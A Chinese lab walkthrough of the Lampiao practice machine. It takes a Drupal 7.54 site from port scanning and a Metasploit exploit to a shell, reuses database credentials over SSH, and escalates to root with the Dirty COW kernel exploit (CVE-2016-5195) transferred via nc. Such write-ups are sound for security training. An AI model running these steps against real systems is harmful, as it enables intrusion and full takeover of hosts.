lampiao靶场-脏牛提权

admin 2024年11月11日23:31:51评论9 views字数 1831阅读6分6秒阅读模式
渗透测试前期准备
攻击机:192.168.71.235(kali系统)
靶机:192.168.71.191

漏洞复现

信息收集

本漏洞需要用到kali自带的Metasploit(简称msf)渗透工具

首先利用kali中的nmap扫描工具扫描目标网站开放的端口

nmap 192.168.71.191 -p 0-65535

发现靶机开放了22  80 和1898端口

lampiao靶场-脏牛提权

首先我们访问80端口发现网站没有任何有用内容,是个空页面。

lampiao靶场-脏牛提权

然后我们访问1898端口,发现网站真正的页面。

lampiao靶场-脏牛提权

随后我们用kali的目录扫描工具扫描了一下目录

lampiao靶场-脏牛提权

在扫描结果里我们发现了robots.txt文件。

  • robots.txt 是一种存放于网站根目录下的文本文件,它通常告诉网络搜索引擎的漫游器(爬虫),此网站中的哪些内容是不应被爬虫获取的,哪些是可以被(爬虫)获取的。(类似于一种君子协议)。

    在渗透测试过程中我们是可以在里面获得一些我们想要的信息的。

    这里我们访问一下这个文件。直接去看Directories(不允许爬虫爬取)的文件。发现了一个叫CHANGELOG.txt的文件。这里感觉大概是一个软件的升级日志。我们直接打开看一下有没有我们需要的信息。

  • lampiao靶场-脏牛提权

打开文件后发现跟我们猜想的差不多

lampiao靶场-脏牛提权

这里我们信息收集获取到了靶机网站的cms程序,以及版本号。

这里收集到最新的一次更新是     Drupal  7.54  2017-02-01

查找可利用漏洞

接下来我们在kali攻击机中启动msf渗透工具

msfconsole

lampiao靶场-脏牛提权

这里我们利用msf搜索Drupal的可用漏洞

search Drupal

lampiao靶场-脏牛提权

发现还是有很多可利用的漏洞的(渗透过程中要有耐心,每个洞都试一下)

这里我们use 1    然后show options一下查看需要配置的选项

lampiao靶场-脏牛提权

这里我们设置一下靶机的ip以及端口

set rhost 192.168.71.191  set rport 1898

配置完成后输入run开始攻击击不成功的话可以尝试下别的漏洞,我们现在是直接成功进入了。

lampiao靶场-脏牛提权

输入shell后发现没有交互界面,这里我们利用Python起一个新的交互的shell

代码放在这里了 有需要的小伙伴可以自取(python -c 'import pty;pty.spawn("/bin/bash")')

lampiao靶场-脏牛提权

接下来就是信息收集,我们尽量把每个文件夹都看一下,找到我们需要的信息。这里就不一一演示了

然后在sites——>default下发现了settings.php(配置信息文件)

lampiao靶场-脏牛提权

接着我们cat查看一下settings.php的信息发现了数据库的配置信息

lampiao靶场-脏牛提权

然后我们到home发现靶机只有一个用户。

lampiao靶场-脏牛提权

这里我们用拿到的数据库密码试一下ssh,成功远程登录tiago用户,接下来就是提权了。

lampiao靶场-脏牛提权

脏牛提权

漏洞编号:CVE-2016-5195

漏洞危害:低权限用户利用该漏洞技术可以在全版本linux系统上实现本地提权,获取root权限。

影响范围:Linux内核>=2.6.22(2007年发行)开始受影响,直到2016年10月18日才修复。

链接:https://pan.baidu.com/s/1ZYX1WKdmmlMh8rDpOHMsEw   提取码:3389(文件我放在网盘了,有需要的小伙伴可以下载使用)

先uname -a查看一下版本,发现版本可执行漏洞

lampiao靶场-脏牛提权

然后需要先从网上下载一个CVE-2016-5195的漏洞放到kali里,这里我们先用tar -czvf dcow1.tar.gz CVE-2016-5195-master 压缩一下文件。

lampiao靶场-脏牛提权

利用拿到的靶机tiago用户权限监听4444端口。

lampiao靶场-脏牛提权

然后通过kali 的nc发送到靶机。(nc 192.168.71.191 4444 > dcow1.tar.gz)

这边看到靶机这边已经接收到文件

lampiao靶场-脏牛提权

然后tar -xzvf dcwo1.tar.gz解压得到CVE-2016-master漏洞

然后cd进入 CVE-2016-maste文件夹,查看一下内容。

lampiao靶场-脏牛提权

这个脚本是已经写好的,这里我们只需要make一下就回自动生成dcow文件。然后./dcow执行一下文件就会更改root密码。这里我们看到密码修改成了:dirtyCowFun

lampiao靶场-脏牛提权

然后直接su root 输入密码提权。拿到root权限。

lampiao靶场-脏牛提权

自此,渗透结束,脏牛提权的使用范围还是比较广的,受影响的版本还是比较多的。

今天的分享就到这里,谢谢大家。对渗透测试感兴趣的小伙伴可以关注一下作者。后续作者还会继续分享有用的渗透测试知识。点赞关注不迷路。

原文始发于微信公众号(Man渗透测试):lampiao靶场---脏牛提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日23:31:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   lampiao靶场-脏牛提权https://cn-sec.com/archives/2062592.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息